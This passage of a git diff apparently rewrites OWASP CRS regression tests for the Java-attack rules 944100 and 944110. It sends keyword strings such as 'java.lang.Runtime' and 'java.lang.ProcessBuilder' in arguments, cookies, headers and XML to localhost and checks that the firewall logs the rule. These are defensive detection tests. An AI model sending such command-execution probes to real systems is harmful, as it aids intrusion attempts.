text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "test=java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-3 - desc: Argument name includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "java.lang.Runtime=test" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-4 - desc: Argument name includes 
keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "java.lang.ProcessBuilder=test" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-5 - desc: Cookie test includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.Runtime - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-6 - desc: Cookie test includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.lang.ProcessBuilder - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-7 - desc: Cookie name includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" 
- Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.Runtime=test - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-8 - desc: Cookie name includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.lang.ProcessBuilder=test - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-9 - desc: Request header test includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.Runtime - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-10 - desc: Request header test includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: 
ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.lang.ProcessBuilder - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-11 - desc: XML element includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - - - test_title: 944100-12 - desc: XML attribute name includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - - - test_title: 944100-13 - desc: XML attribute value includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - 
log_contains: "id \"944100\"" - - - - test_title: 944100-14 - desc: XML element value includes keywords java.lang.Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "java.lang.Runtime" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-15 - desc: XML element includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944100\"" - - - - test_title: 944100-16 - desc: XML attribute name includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944100\"" - - - - test_title: 944100-17 - desc: XML attribute value includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944100\"" - - - - test_title: 944100-18 - desc: XML element value includes keywords java.lang.ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "java.lang.ProcessBuilder" - output: - log_contains: "id \"944100\"" +meta: + author: "spartantri" + enabled: true + name: "944100.yaml" + description: "Description" +tests: + - test_title: 944100-1 + desc: Argument test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + version: HTTP/1.0 + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_title: 944100-2 + desc: Argument test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "test=java.lang.ProcessBuilder"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-3
+ desc: Argument name includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "java.lang.Runtime=test"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-4
+ desc: Argument name includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "java.lang.ProcessBuilder=test"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-5
+ desc: Cookie test includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: test=java.lang.Runtime
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-6
+ desc: Cookie test includes 
keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: test=java.lang.ProcessBuilder
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-7
+ desc: Cookie name includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: java.lang.Runtime=test
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-8
+ desc: Cookie name includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ Cookie: java.lang.ProcessBuilder=test
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-9
+ desc: Request header test includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ 
Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ test: java.lang.Runtime
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-10
+ desc: Request header test includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ test: java.lang.ProcessBuilder
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-11
+ desc: XML element includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "value"
+ output:
+ no_log_contains: "id \"944100\""
+ - test_title: 944100-12
+ desc: XML attribute name includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944100\""
+ - test_title: 944100-13
+ desc: XML attribute value includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ 
User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-14
+ desc: XML element value includes keywords java.lang.Runtime
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "java.lang.Runtime"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-15
+ desc: XML element includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "value"
+ output:
+ no_log_contains: "id \"944100\""
+ - test_title: 944100-16
+ desc: XML attribute name includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ no_log_contains: "id \"944100\""
+ - test_title: 944100-17
+ desc: XML 
attribute value includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "element_value"
+ output:
+ log_contains: "id \"944100\""
+ - test_title: 944100-18
+ desc: XML element value includes keywords java.lang.ProcessBuilder
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "application/xml"
+ method: POST
+ version: HTTP/1.0
+ data: "java.lang.ProcessBuilder"
+ output:
+ log_contains: "id \"944100\""
diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
index 198c02ba2c..c7cc1360a3 100644
--- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
+++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
@@ -1,426 +1,355 @@ --- - meta: - author: "spartantri" - enabled: true - name: "944110.yaml" - description: "Description" - tests: - - - test_title: 944110-1 - desc: Argument test includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/x-www-form-urlencoded" - method: POST - version: HTTP/1.0 - data: "test=java.Runtime" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-2 - desc: Argument test includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "test=java.ProcessBuilder" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-3 - desc: Argument name includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "java.Runtime=test" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-4 - desc: Argument name includes keywords java. 
and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - method: POST - version: HTTP/1.0 - data: "java.ProcessBuilder=test" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-5 - desc: Cookie test includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.Runtime - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-6 - desc: Cookie test includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: test=java.ProcessBuilder - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-7 - desc: Cookie name includes keywords java. 
and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.Runtime=test - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-8 - desc: Cookie name includes keywords java. and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - Cookie: java.ProcessBuilder=test - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-9 - desc: Request header test includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.Runtime - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-10 - desc: Request header test includes keywords java. 
and ProcessBuilder - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "text/plain" - test: java.ProcessBuilder - method: POST - version: HTTP/1.0 - data: "test=value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-11 - desc: XML element includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "value" - output: - no_log_contains: "id \"944110\"" - - - - test_title: 944110-12 - desc: XML attribute name includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - no_log_contains: "id \"944110\"" - - - - test_title: 944110-13 - desc: XML attribute value includes keywords java. 
and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Content-Type: "application/xml" - method: POST - version: HTTP/1.0 - data: "element_value" - output: - log_contains: "id \"944110\"" - - - - test_title: 944110-14 - desc: XML element value includes keywords java. and Runtime - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 - 